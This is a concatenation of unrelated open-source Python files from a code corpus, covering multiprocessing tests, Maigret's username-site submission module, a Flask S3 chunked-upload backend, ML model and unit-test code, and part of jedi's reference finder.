cond.acquire()
print '\t' + str(cond)
time.sleep(2)
print '\tchild is notifying'
print '\t' + str(cond)
cond.notify()
cond.release()
def test_condition():
cond = processing.Condition()
p = processing.Process(target=condition_func, args=(cond,))
print cond
cond.acquire()
print cond
cond.acquire()
print cond
p.start()
print 'main is waiting'
cond.wait()
print 'main has woken up'
print cond
cond.release()
print cond
cond.release()
p.join()
print cond
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print running.value, 'tasks are running'
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print '%s has finished' % processing.currentProcess()
mutex.release()
sema.release()
def test_semaphore():
sema = processing.Semaphore(3)
mutex = processing.RLock()
running = processing.Value('i', 0)
processes = [
processing.Process(target=semaphore_func, args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print '\tchild sleeping'
time.sleep(5.5)
print '\n\tchild terminating'
def test_join_timeout():
p = processing.Process(target=join_timeout_func)
p.start()
print 'waiting for process to finish'
while 1:
p.join(timeout=1)
if not p.isAlive():
break
print '.',
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print '\t%r is waiting' % processing.currentProcess()
event.wait()
print '\t%r has woken up' % processing.currentProcess()
def test_event():
event = processing.Event()
processes = [processing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print 'main is sleeping'
time.sleep(2)
print 'main is setting event'
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print 'Tests passed'
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', range(100)),
('d', [0.25 * i for i in range(100)]),
('H', range(1000))
]
shared_values = [processing.Value(id, v) for id, v in values]
shared_arrays = [processing.Array(id, a) for id, a in arrays]
p = processing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.getExitCode() == 0
####
def test(namespace=processing):
global processing
processing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print '\n\t######## %s\n' % func.__name__
func()
ignore = processing.activeChildren() # cleanup any old processes
if hasattr(processing, '_debugInfo'):
info = processing._debugInfo()
if info:
print info
raise ValueError, 'there should be no positive refcounts left'
if __name__ == '__main__':
processing.freezeSupport()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print ' Using processes '.center(79, '-')
namespace = processing
elif sys.argv[1] == 'manager':
print ' Using processes and a manager '.center(79, '-')
namespace = processing.Manager()
namespace.Process = processing.Process
namespace.currentProcess = processing.currentProcess
namespace.activeChildren = processing.activeChildren
elif sys.argv[1] == 'threads':
print ' Using threads '.center(79, '-')
import processing.dummy as namespace
else:
print 'Usage:\n\t%s [processes | manager | threads]' % sys.argv[0]
raise SystemExit, 2
test(namespace)
|
maigret/submit.py | noi4eg/maigret | 1,156 | 11195415 | import asyncio
import json
import re
from typing import List
import xml.etree.ElementTree as ET
import requests
from .activation import import_aiohttp_cookies
from .checking import maigret
from .result import QueryStatus
from .settings import Settings
from .sites import MaigretDatabase, MaigretSite, MaigretEngine
from .utils import get_random_user_agent, get_match_ratio
class Submitter:
HEADERS = {
"User-Agent": get_random_user_agent(),
}
SEPARATORS = "\"'"
RATIO = 0.6
TOP_FEATURES = 5
URL_RE = re.compile(r"https?://(www\.)?")
def __init__(self, db: MaigretDatabase, settings: Settings, logger):
self.settings = settings
self.db = db
self.logger = logger
@staticmethod
def get_alexa_rank(site_url_main):
url = f"http://data.alexa.com/data?cli=10&url={site_url_main}"
xml_data = requests.get(url).text
root = ET.fromstring(xml_data)
alexa_rank = 0
try:
alexa_rank = int(root.find('.//REACH').attrib['RANK'])
except Exception:
pass
return alexa_rank
@staticmethod
def extract_mainpage_url(url):
return "/".join(url.split("/", 3)[:3])
async def site_self_check(self, site, semaphore, silent=False):
changes = {
"disabled": False,
}
check_data = [
(site.username_claimed, QueryStatus.CLAIMED),
(site.username_unclaimed, QueryStatus.AVAILABLE),
]
self.logger.info(f"Checking {site.name}...")
for username, status in check_data:
results_dict = await maigret(
username=username,
site_dict={site.name: site},
logger=self.logger,
timeout=30,
id_type=site.type,
forced=True,
no_progressbar=True,
)
# don't disable entries with other ids types
# TODO: make normal checking
if site.name not in results_dict:
self.logger.info(results_dict)
changes["disabled"] = True
continue
result = results_dict[site.name]["status"]
site_status = result.status
if site_status != status:
if site_status == QueryStatus.UNKNOWN:
msgs = site.absence_strs
etype = site.check_type
self.logger.warning(
"Error while searching '%s' in %s: %s, %s, check type %s",
username,
site.name,
result.context,
msgs,
etype,
)
# don't disable in case of available username
if status == QueryStatus.CLAIMED:
changes["disabled"] = True
elif status == QueryStatus.CLAIMED:
self.logger.warning(
f"Not found `{username}` in {site.name}, must be claimed"
)
self.logger.info(results_dict[site.name])
changes["disabled"] = True
else:
self.logger.warning(
f"Found `{username}` in {site.name}, must be available"
)
self.logger.info(results_dict[site.name])
changes["disabled"] = True
self.logger.info(f"Site {site.name} checking is finished")
return changes
def generate_additional_fields_dialog(self, engine: MaigretEngine, dialog):
fields = {}
if 'urlSubpath' in engine.site.get('url', ''):
msg = (
'Detected engine suppose additional URL subpath using (/forum/, /blog/, etc). '
'Enter in manually if it exists: '
)
subpath = input(msg).strip('/')
if subpath:
fields['urlSubpath'] = f'/{subpath}'
return fields
async def detect_known_engine(self, url_exists, url_mainpage) -> List[MaigretSite]:
try:
r = requests.get(url_mainpage)
self.logger.debug(r.text)
except Exception as e:
self.logger.warning(e)
print("Some error while checking main page")
return []
for engine in self.db.engines:
strs_to_check = engine.__dict__.get("presenseStrs")
if strs_to_check and r and r.text:
all_strs_in_response = True
for s in strs_to_check:
if s not in r.text:
all_strs_in_response = False
sites = []
if all_strs_in_response:
engine_name = engine.__dict__.get("name")
print(f"Detected engine {engine_name} for site {url_mainpage}")
usernames_to_check = self.settings.supposed_usernames
supposed_username = self.extract_username_dialog(url_exists)
if supposed_username:
usernames_to_check = [supposed_username] + usernames_to_check
add_fields = self.generate_additional_fields_dialog(
engine, url_exists
)
for u in usernames_to_check:
site_data = {
"urlMain": url_mainpage,
"name": url_mainpage.split("//")[1],
"engine": engine_name,
"usernameClaimed": u,
"usernameUnclaimed": "noonewouldeverusethis7",
**add_fields,
}
self.logger.info(site_data)
maigret_site = MaigretSite(
url_mainpage.split("/")[-1], site_data
)
maigret_site.update_from_engine(
self.db.engines_dict[engine_name]
)
sites.append(maigret_site)
return sites
return []
def extract_username_dialog(self, url):
url_parts = url.rstrip("/").split("/")
supposed_username = url_parts[-1].strip('@')
entered_username = input(
f'Is "{supposed_username}" a valid username? If not, write it manually: '
)
return entered_username if entered_username else supposed_username
async def check_features_manually(
self, url_exists, url_mainpage, cookie_file, redirects=False
):
custom_headers = {}
while True:
header_key = input(
'Specify custom header if you need or just press Enter to skip. Header name: '
)
if not header_key:
break
header_value = input('Header value: ')
custom_headers[header_key.strip()] = header_value.strip()
supposed_username = self.extract_username_dialog(url_exists)
non_exist_username = "noonewouldeverusethis7"
url_user = url_exists.replace(supposed_username, "{username}")
url_not_exists = url_exists.replace(supposed_username, non_exist_username)
headers = dict(self.HEADERS)
headers.update(custom_headers)
# cookies
cookie_dict = None
if cookie_file:
self.logger.info(f'Use {cookie_file} for cookies')
cookie_jar = import_aiohttp_cookies(cookie_file)
cookie_dict = {c.key: c.value for c in cookie_jar}
exists_resp = requests.get(
url_exists, cookies=cookie_dict, headers=headers, allow_redirects=redirects
)
self.logger.debug(url_exists)
self.logger.debug(exists_resp.status_code)
self.logger.debug(exists_resp.text)
non_exists_resp = requests.get(
url_not_exists,
cookies=cookie_dict,
headers=headers,
allow_redirects=redirects,
)
self.logger.debug(url_not_exists)
self.logger.debug(non_exists_resp.status_code)
self.logger.debug(non_exists_resp.text)
a = exists_resp.text
b = non_exists_resp.text
tokens_a = set(re.split(f'[{self.SEPARATORS}]', a))
tokens_b = set(re.split(f'[{self.SEPARATORS}]', b))
a_minus_b = tokens_a.difference(tokens_b)
b_minus_a = tokens_b.difference(tokens_a)
if len(a_minus_b) == len(b_minus_a) == 0:
print("The pages for existing and non-existing account are the same!")
top_features_count = int(
input(
f"Specify count of features to extract [default {self.TOP_FEATURES}]: "
)
or self.TOP_FEATURES
)
match_fun = get_match_ratio(self.settings.presence_strings)
presence_list = sorted(a_minus_b, key=match_fun, reverse=True)[
:top_features_count
]
print("Detected text features of existing account: " + ", ".join(presence_list))
features = input("If features was not detected correctly, write it manually: ")
if features:
presence_list = list(map(str.strip, features.split(",")))
absence_list = sorted(b_minus_a, key=match_fun, reverse=True)[
:top_features_count
]
print(
"Detected text features of non-existing account: " + ", ".join(absence_list)
)
features = input("If features was not detected correctly, write it manually: ")
if features:
absence_list = list(map(str.strip, features.split(",")))
site_data = {
"absenceStrs": absence_list,
"presenseStrs": presence_list,
"url": url_user,
"urlMain": url_mainpage,
"usernameClaimed": supposed_username,
"usernameUnclaimed": non_exist_username,
"checkType": "message",
}
if headers != self.HEADERS:
site_data['headers'] = headers
site = MaigretSite(url_mainpage.split("/")[-1], site_data)
return site
async def dialog(self, url_exists, cookie_file):
domain_raw = self.URL_RE.sub("", url_exists).strip().strip("/")
domain_raw = domain_raw.split("/")[0]
self.logger.info('Domain is %s', domain_raw)
# check for existence
matched_sites = list(
filter(lambda x: domain_raw in x.url_main + x.url, self.db.sites)
)
if matched_sites:
print(
f'Sites with domain "{domain_raw}" already exists in the Maigret database!'
)
status = lambda s: "(disabled)" if s.disabled else ""
url_block = lambda s: f"\n\t{s.url_main}\n\t{s.url}"
print(
"\n".join(
[
f"{site.name} {status(site)}{url_block(site)}"
for site in matched_sites
]
)
)
if input("Do you want to continue? [yN] ").lower() in "n":
return False
url_mainpage = self.extract_mainpage_url(url_exists)
print('Detecting site engine, please wait...')
sites = []
try:
sites = await self.detect_known_engine(url_exists, url_mainpage)
except KeyboardInterrupt:
print('Engine detect process is interrupted.')
if not sites:
print("Unable to detect site engine, lets generate checking features")
sites = [
await self.check_features_manually(
url_exists, url_mainpage, cookie_file
)
]
self.logger.debug(sites[0].__dict__)
sem = asyncio.Semaphore(1)
print("Checking, please wait...")
found = False
chosen_site = None
for s in sites:
chosen_site = s
result = await self.site_self_check(s, sem)
if not result["disabled"]:
found = True
break
if not found:
print(
f"Sorry, we couldn't find params to detect account presence/absence in {chosen_site.name}."
)
print(
"Try to run this mode again and increase features count or choose others."
)
self.logger.debug(json.dumps(chosen_site.json))
return False
else:
if (
input(
f"Site {chosen_site.name} successfully checked. Do you want to save it in the Maigret DB? [Yn] "
)
.lower()
.strip("y")
):
return False
chosen_site.name = input("Change site name if you want: ") or chosen_site.name
chosen_site.tags = list(map(str.strip, input("Site tags: ").split(',')))
rank = Submitter.get_alexa_rank(chosen_site.url_main)
if rank:
print(f'New alexa rank: {rank}')
chosen_site.alexa_rank = rank
self.logger.debug(chosen_site.json)
site_data = chosen_site.strip_engine_data()
self.logger.debug(site_data.json)
self.db.update_site(site_data)
return True
|
example_backend.py | scottmberry/mule-uploader | 131 | 11195424 | from flask import Flask, request, render_template
from sqlalchemy import create_engine, Column, Integer
from sqlalchemy import String, DateTime, Text, MetaData
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from werkzeug import SharedDataMiddleware
from hashlib import sha1
from settings import DEBUG, AWS_ACCESS_KEY, AWS_SECRET, MIME_TYPE, BUCKET
from settings import ENGINE, PORT, CHUNK_SIZE, AWS_REGION
from urllib import quote
from datetime import datetime
import os
import hmac
import base64
import time
import json
import random
import hashlib
## The Upload DB Model
engine = create_engine(ENGINE, convert_unicode=True)
db = scoped_session(sessionmaker(
autocommit=False, autoflush=True, bind=engine))
Base = declarative_base()
Base.query = db.query_property()
metadata = MetaData()
class Upload(Base):
__tablename__ = 'upload'
id = Column(Integer, primary_key=True)
filename = Column(String(256))
filesize = Column(String(64))
last_modified = Column(String(64))
upload_start = Column(DateTime)
last_information = Column(DateTime)
key = Column(String(256))
upload_id = Column(String(128))
chunks_uploaded = Column(Text)
Upload.metadata.create_all(bind=engine)
## Boilerplate
app = Flask(__name__)
app.debug = DEBUG
def init_db():
metadata.create_all(bind=engine)
init_db()
@app.teardown_request
def teardown_db(exception=None):
db.remove()
## Helper Functions
def _sign(key, msg):
return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest()
def _get_signature_key(key, date_stamp, region_name, service_name):
k_date = _sign(("AWS4" + key).encode("utf-8"), date_stamp)
k_region = _sign(k_date, region_name)
k_service = _sign(k_region, service_name)
k_signing = _sign(k_service, "aws4_request")
return k_signing
def get_signature(date):
return _get_signature_key(
AWS_SECRET, date.strftime("%Y%m%d"), AWS_REGION, "s3").encode('hex')
## Actual backend
@app.route("/upload-backend/signing_key/")
def signing_key():
date = datetime.utcnow()
key = get_signature(date)
filename = request.args['filename']
filesize = request.args['filesize']
last_modified = request.args['last_modified']
data = {
"date": date.isoformat() + 'Z',
"signature": key,
"access_key": AWS_ACCESS_KEY,
"region": AWS_REGION,
"bucket": BUCKET,
"backup_key": str(random.randint(1, 1000000)),
"content_type": MIME_TYPE,
}
try:
assert 'force' not in request.args
u = db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).first()
assert u
data.update({
"key": u.key,
"upload_id": u.upload_id,
"chunks": map(int, u.chunks_uploaded.split(',')),
})
except AssertionError:
db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).delete()
db.commit()
return json.dumps(data)
@app.route("/upload-backend/chunk_loaded/")
def upload_action():
key = request.args.get('key')
upload_id = request.args.get('upload_id')
filename = request.args['filename']
filesize = request.args['filesize']
last_modified = request.args['last_modified']
chunk = int(request.args['chunk'])
if filesize > CHUNK_SIZE:
try:
u = db.query(Upload).filter(
Upload.filename == filename,
Upload.filesize == filesize,
Upload.last_modified == last_modified
).first()
assert u
chunks = set(map(int, u.chunks_uploaded.split(',')))
chunks.add(chunk)
u.chunks_uploaded = ','.join(map(str, chunks))
db.commit()
except AssertionError:
u = Upload(
filename=filename,
filesize=filesize,
last_modified=last_modified,
chunks_uploaded=str(chunk),
key=key,
upload_id=upload_id,
)
db.add(u)
db.commit()
return ''
## Static files (debugging only)
@app.route("/")
def index():
return render_template('index.html', aws_access_key=AWS_ACCESS_KEY,
mime_type=MIME_TYPE, bucket=BUCKET,
region=AWS_REGION,
key=str(random.randint(1, 1000000)))
if app.debug:
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {
'/': os.path.join(os.path.dirname(__file__), '')
})
if __name__ == "__main__":
app.run(host='0.0.0.0', port=PORT)
|
tools/mo/unit_tests/mo/front/HSwish_fusing_test.py | ryanloney/openvino-1 | 1,127 | 11195431 | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
from openvino.tools.mo.front.HSwish_fusion import HSwishWithClamp, HSwishWithMinMax
from openvino.tools.mo.front.common.partial_infer.utils import float_array
from openvino.tools.mo.utils.ir_engine.compare_graphs import compare_graphs
from unit_tests.utils.graph import build_graph, const, regular_op, result, build_graph_with_edge_attrs
ref_nodes = {**regular_op('input', {'type': 'Parameter'}),
**regular_op('hswish', {'type': 'HSwish', 'name': 'final_mul'}),
**result('result')
}
ref_edges = [('input', 'hswish'), ('hswish', 'result')]
class HSwishWithClampTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('relu6', {'op': 'Clamp'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}
edges = [('input', 'mul', {'in': 0, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'relu6', {'in': 0, 'out': 0}),
('const_0', 'relu6', {'in': 1, 'out': 0}),
('const_6', 'relu6', {'in': 2, 'out': 0}),
('relu6', 'mul', {'in': 1, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_hswish_with_clamp(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'HSwish')
def test_hswish_with_clamp_wrong_constant(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {'const_0': {'value': float_array([0.00001])}})
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_hswish_with_clamp_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('relu6', {'op': 'Clamp'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}, [('input', 'mul', {'in': 0, 'out': 0}),
('input_2', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'relu6', {'in': 0, 'out': 0}),
('const_0', 'relu6', {'in': 1, 'out': 0}),
('const_6', 'relu6', {'in': 2, 'out': 0}),
('relu6', 'mul', {'in': 1, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})])
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithClamp().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
class HSwishWithMinMaxTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('max', {'op': 'Maximum'}),
**regular_op('min', {'op': 'Minimum'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}
edges = [('input', 'mul', {'in': 1, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'max', {'in': 0, 'out': 0}),
('const_0', 'max', {'in': 1, 'out': 0}),
('max', 'min', {'in': 0, 'out': 0}),
('const_6', 'min', {'in': 1, 'out': 0}),
('min', 'mul', {'in': 0, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_hswish_with_min_max(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'HSwish')
def test_hswish_with_min_max_wrong_constant(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {'const_0': {'value': float_array([0.00001])}})
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_hswish_with_min_max_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('add', {'op': 'Add'}),
**regular_op('max', {'op': 'Maximum'}),
**regular_op('min', {'op': 'Minimum'}),
**regular_op('mul', {'op': 'Mul'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**const('const_0', float_array([0.0])),
**const('const_3', float_array([3.0])),
**const('const_6', float_array([6.0])),
**const('const_1_6', float_array([1.0 / 6.0])),
**result('result'),
}, [('input_2', 'mul', {'in': 1, 'out': 0}),
('input', 'add', {'in': 0, 'out': 0}),
('const_3', 'add', {'in': 1, 'out': 0}),
('add', 'max', {'in': 0, 'out': 0}),
('const_0', 'max', {'in': 1, 'out': 0}),
('max', 'min', {'in': 0, 'out': 0}),
('const_6', 'min', {'in': 1, 'out': 0}),
('min', 'mul', {'in': 0, 'out': 0}),
('mul', 'mul_2', {'in': 0, 'out': 0}),
('const_1_6', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})])
graph_ref = graph.copy()
graph.stage = 'front'
HSwishWithMinMax().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
|
tslearn/tests/test_svm.py | andriyor/tslearn | 1,151 | 11195436 | import numpy as np
from tslearn.metrics import cdist_gak
from tslearn.svm import TimeSeriesSVC, TimeSeriesSVR
__author__ = '<NAME> <EMAIL>[<EMAIL>'
def test_gamma_value_svm():
n, sz, d = 5, 10, 3
rng = np.random.RandomState(0)
time_series = rng.randn(n, sz, d)
labels = rng.randint(low=0, high=2, size=n)
gamma = 10.
for ModelClass in [TimeSeriesSVC, TimeSeriesSVR]:
gak_model = ModelClass(kernel="gak", gamma=gamma)
sklearn_X, _ = gak_model._preprocess_sklearn(time_series,
labels,
fit_time=True)
cdist_mat = cdist_gak(time_series, sigma=np.sqrt(gamma / 2.))
np.testing.assert_allclose(sklearn_X, cdist_mat)
def test_deprecated_still_work():
n, sz, d = 5, 10, 3
rng = np.random.RandomState(0)
X = rng.randn(n, sz, d)
y = rng.randint(low=0, high=2, size=n)
for ModelClass in [TimeSeriesSVC, TimeSeriesSVR]:
clf = ModelClass().fit(X, y)
np.testing.assert_equal(clf.support_vectors_time_series_().shape[1:],
X.shape[1:])
|
cms/test_utils/project/pluginapp/plugins/multicolumn/models.py | Mario-Kart-Felix/django-cms | 5,659 | 11195455 | <filename>cms/test_utils/project/pluginapp/plugins/multicolumn/models.py
from cms.models import CMSPlugin
class MultiColumns(CMSPlugin):
"""
A plugin that has sub Column classes
"""
def __str__(self):
plugins = self.child_plugin_instances or []
return "{} columns".format(len(plugins))
|
code/model_part_pc.py | jeonghyunkeem/structurenet | 212 | 11195466 | <filename>code/model_part_pc.py
"""
This file defines part point cloud VAE/AE model.
"""
import torch
import torch.nn as nn
from chamfer_distance import ChamferDistance
from collections import namedtuple
class PartFeatSampler(nn.Module):
def __init__(self, feature_size, probabilistic=True):
super(PartFeatSampler, self).__init__()
self.probabilistic = probabilistic
self.mlp2mu = nn.Linear(feature_size, feature_size)
self.mlp2var = nn.Linear(feature_size, feature_size)
def forward(self, x):
mu = self.mlp2mu(x)
if self.probabilistic:
logvar = self.mlp2var(x)
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)
kld = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
return torch.cat([eps.mul(std).add_(mu), kld], 1)
else:
return mu
class PartEncoder(nn.Module):
def __init__(self, feat_len, probabilistic=False):
super(PartEncoder, self).__init__()
self.conv1 = nn.Conv1d(3, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 128, 1)
self.conv4 = nn.Conv1d(128, feat_len, 1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(feat_len)
self.sampler = PartFeatSampler(feature_size=feat_len, probabilistic=probabilistic)
def forward(self, pc):
net = pc.transpose(2, 1)
net = torch.relu(self.bn1(self.conv1(net)))
net = torch.relu(self.bn2(self.conv2(net)))
net = torch.relu(self.bn3(self.conv3(net)))
net = torch.relu(self.bn4(self.conv4(net)))
net = net.max(dim=2)[0]
net = self.sampler(net)
return net
class PartDecoder(nn.Module):
def __init__(self, feat_len, num_point):
super(PartDecoder, self).__init__()
self.num_point = num_point
self.mlp1 = nn.Linear(feat_len, feat_len)
self.mlp2 = nn.Linear(feat_len, feat_len)
self.mlp3 = nn.Linear(feat_len, num_point*3)
self.bn1 = nn.BatchNorm1d(feat_len)
self.bn2 = nn.BatchNorm1d(feat_len)
self.chamferLoss = ChamferDistance()
def forward(self, net):
net = torch.relu(self.bn1(self.mlp1(net)))
net = torch.relu(self.bn2(self.mlp2(net)))
net = self.mlp3(net).view(-1, self.num_point, 3)
return net
def loss(self, pred, gt):
dist1, dist2 = self.chamferLoss(pred, gt)
loss = (dist1.mean(dim=1) + dist2.mean(dim=1)) / 2
avg_loss = loss.mean() * 1000
return avg_loss
|
networks/SPyNet/PYTHON_Flow2Color/computeColor.py | donegaci/memc-net | 145 | 11195475 | <reponame>donegaci/memc-net
import sys
import os
import time
import random
import subprocess as sp
# import cv2
import numpy as np
import matplotlib.pyplot as plt
from scipy.misc import imread, imsave, imshow, imresize, imsave
from skimage import color
def makeColorwheel():
RY = 15
YG = 6
GC = 4
CB = 11
BM = 13
MR = 6
ncols = RY + YG + GC + CB + BM + MR
colorwheel = np.zeros([ncols, 3]) # r g b
col = 0
# RY
colorwheel[0: RY, 0] = 255
colorwheel[0: RY, 1] = np.floor(255 * np.arange(0,RY) / RY)
col = col + RY
# YG
colorwheel[col : col + YG, 0] = 255 - np.floor(255 * np.arange(0,YG) / YG)
colorwheel[col : col + YG, 1] = 255
col = col + YG
# GC
colorwheel[col : col + GC, 1] = 255
colorwheel[col : col + GC, 2] = np.floor(255 * np.arange(0, GC ) / GC)
col = col + GC
# CB
colorwheel[col : col + CB, 1] = 255 - np.floor(255 * np.arange(0, CB ) / CB)
colorwheel[col : col + CB, 2] = 255
col = col + CB
# BM
colorwheel[col : col + BM, 2] = 255
colorwheel[col : col + BM, 0] = np.floor(255 * np.arange(0, BM ) / BM)
col = col + BM
# MR
colorwheel[col : col + MR, 2] = 255 - np.floor(255 * np.arange(0, MR ) / MR)
colorwheel[col : col + MR, 0] = 255
return colorwheel
def computeColor(u,v):
nanIdx = np.isnan(u) | np.isnan(v)
u[nanIdx] = 0
v[nanIdx] = 0
colorwheel = makeColorwheel()
ncols = colorwheel.shape[0]
rad = np.sqrt(u *u + v*v)
a = np.arctan2(-v,-u)/np.pi
fk = (a+1) / 2 * (ncols - 1)
k0 = np.int32(np.floor(fk))
k1 = k0 + 1
k1[k1==ncols] = 0
f = fk - k0
img = np.zeros([u.shape[0],u.shape[1],3])
for i in range(colorwheel.shape[1]):
temp = colorwheel[:,i]
col0 = temp[k0] / 255
col1 = temp[k1] / 255
col = (1-f) * col0 + f * col1
idx = rad <=1
col[idx] = 1 - rad[idx] * ( 1-col[idx])
idx = rad > 1
col[idx] = col[idx] *0.75
img[:,:,i] = np.uint8(np.floor(255*col *(1-nanIdx)).clip(0.0,255.0))
return img
if __name__ == '__main__':
cw = makeColorwheel()
|
venv/Lib/site-packages/jedi/inference/references.py | ajayiagbebaku/NFL-Model | 1,318 | 11195486 | <filename>venv/Lib/site-packages/jedi/inference/references.py
import os
import re
from parso import python_bytes_to_unicode
from jedi.debug import dbg
from jedi.file_io import KnownContentFileIO
from jedi.inference.names import SubModuleName
from jedi.inference.imports import load_module_from_path
from jedi.inference.filters import ParserTreeFilter
from jedi.inference.gradual.conversion import convert_names
_IGNORE_FOLDERS = ('.tox', '.venv', 'venv', '__pycache__')
_OPENED_FILE_LIMIT = 2000
"""
Stats from a 2016 Lenovo Notebook running Linux:
With os.walk, it takes about 10s to scan 11'000 files (without filesystem
caching). Once cached it only takes 5s. So it is expected that reading all
those files might take a few seconds, but not a lot more.
"""
_PARSED_FILE_LIMIT = 30
"""
For now we keep the amount of parsed files really low, since parsing might take
easily 100ms for bigger files.
"""
def _resolve_names(definition_names, avoid_names=()):
for name in definition_names:
if name in avoid_names:
# Avoiding recursions here, because goto on a module name lands
# on the same module.
continue
if not isinstance(name, SubModuleName):
# SubModuleNames are not actually existing names but created
# names when importing something like `import foo.bar.baz`.
yield name
if name.api_type == 'module':
yield from _resolve_names(name.goto(), definition_names)
def _dictionarize(names):
return dict(
(n if n.tree_name is None else n.tree_name, n)
for n in names
)
def _find_defining_names(module_context, tree_name):
found_names = _find_names(module_context, tree_name)
for name in list(found_names):
# Convert from/to stubs, because those might also be usages.
found_names |= set(convert_names(
[name],
only_stubs=not name.get_root_context().is_stub(),
prefer_stub_to_compiled=False
))
found_names |= set(_find_global_variables(found_names, tree_name.value))
for name in list(found_names):
if name.api_type == 'param' or name.tree_name is None \
or name.tree_name.parent.type == 'trailer':
continue
found_names |= set(_add_names_in_same_context(name.parent_context, name.string_name))
